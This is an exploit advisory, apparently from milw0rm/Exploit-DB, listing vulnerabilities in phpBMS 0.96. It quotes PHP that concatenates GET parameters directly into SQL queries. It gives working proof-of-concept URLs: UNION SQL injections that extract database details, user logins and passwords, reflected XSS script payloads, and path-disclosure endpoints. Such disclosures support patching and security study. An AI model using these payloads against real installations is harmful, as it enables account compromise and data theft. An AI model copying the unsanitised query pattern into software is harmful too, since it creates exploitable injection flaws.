phpbms 0.96 - Multiple Vulnerabilities



Author:

eLwaux

Type:

webapps


Platform:

PHP

Date:

2009-07-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

phpBMS v0.96
phpbms.org

eLwaux(c)2009, uasc.org.ua
http://phpbms.org/trial/


## ## ##
SQL Inj
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
	$querystatement="SELECT
if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
                  AS value FROM discounts WHERE id=".$_GET["id"];
	$queryresult = $db->query($querystatement);
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())



## ## ##
SQL Inj
\dbgraphic.php
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
".$_GET["t"]." WHERE id=".$_GET["r"];
	$queryresult=$db->query($querystatement);
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1


## ## ##
SQL Inj
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
	if(isset($_GET["cmd"])){
		switch($_GET["cmd"]){
			case "show":
				showSearch($_GET["tid"],$_GET["base"],$db);
			break;
		}//end switch
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PoC:
	/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
	/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2


## ## ##
pXSS
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        <form name="form1" method="post" action="<?php echo
$_SERVER["PHP_SELF"]?>">
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PoC:
     \index.php/"><script>alert(/xss/);</script><div id="
     \modules\base\myaccount.php/"><script>alert(/xss/);</script><div id="
     \phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div
id="
     \phpbms\modules\base\tabledefs_options.php\">{XSS}
     \phpbms\modules\base\adminsettings.php\">{XSS}


## ## ##
Path Disclosure
     /footer.php
     /header.php
     /advancedsearch.php?cmd=show&
     /choicelist.php

# milw0rm.com [2009-07-10]